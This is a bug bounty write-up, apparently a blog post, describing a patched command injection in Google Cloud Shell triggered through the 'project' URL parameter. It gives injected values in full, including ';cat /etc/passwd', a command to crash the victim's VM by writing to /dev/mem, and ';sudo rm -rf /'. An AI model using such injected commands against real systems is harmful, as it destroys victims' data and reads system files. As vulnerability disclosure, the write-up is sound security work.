How I got 6000$ from #Google

Hey all ,

Few months back I found a command injection bug in Google Cloud shell

Since the title goes by the name “command injection” , you all might be thinking it as “normal Command injection which affects servers” but this vulnerability is quite different.

We can put this in different way as “Client Side command injection”.

About Google Cloud shell you can refer here “ Google Cloud Shell

Lets get into the finding

While I was testing “console.cloud.google.com” , There was one url with this pattern

https://console.cloud.google.com/home/dashboard?project="name of the project”

Ok thats cool :v ,

Tested for IDOR ,

Crafted the url as

https://console.cloud.google.com/home/dashboard?project="Random project name”

Eg:

https://console.cloud.google.com/home/dashboard?project=project-1 (not vulnerable to IDOR)

But reflected the name of project in Cloud shell.

So Tested for XSS ,

Crafted the url as

https://console.cloud.google.com/home/dashboard?project="XSS vector” (not vulnerable to XSS)

On activating cloud shell “there was some syntax error”

Now the creepy mind of mine came with idea :P to use delimiter ,

Crafted the url as ,

https://console.cloud.google.com/home/dashboard?project=;

There was no syntax error , and cloudshell created successfully!

Now the exploit part ,

In linux we can chain commands in various ways , the one way is by using semi-colon operator

Eg: apt-get update; apt-get upgrade

Once again ->

https://console.cloud.google.com/home/dashboard?project=;ping google.com

The above url created cloud shell , and pinged google.com

That worked perfectly

https://console.cloud.google.com/home/dashboard?project=;cat /etc/passwd

Ok , its self-execution ,it only got executed in my own cloud shell . Now I was clear “I can inject commands which affects my own vm but not Google servers”

To make this as exploitable issue , I came with these ideas,,

Crashing Victim vm :

https://console.cloud.google.com/home/dashboard?project=;sudo cp /dev/zero /dev/mem

Once victim access the above url and click “Activate cloud shell” , his/her vm crashes.

Deleting files: (this one had much impact than previous command)

https://console.cloud.google.com/home/dashboard?project=;sudo rm -rf /

This will delete victims root directory which also deletes appengine files!

According to my research: Once the victim access the crafted url , Victim must click “Activate cloud shell” , in order to make the attack successful!

But Google Security Team tested and found that , to make attack successful there is no need of (click) user interaction.

Now the issue has been patched , I was rewarded 6000$ for my finding

and also Google Security Team featured this Vulnerability at #Nullcon

This vulnerability existed in bash script created in client side (javascript) , it affected

-> https://console.cloud.google.com

-> https://console.developer.google.com

Thanks to #Google Security Team :)

For remaining Google’s presentation slides you can refer here “ Secrets Of Google VRP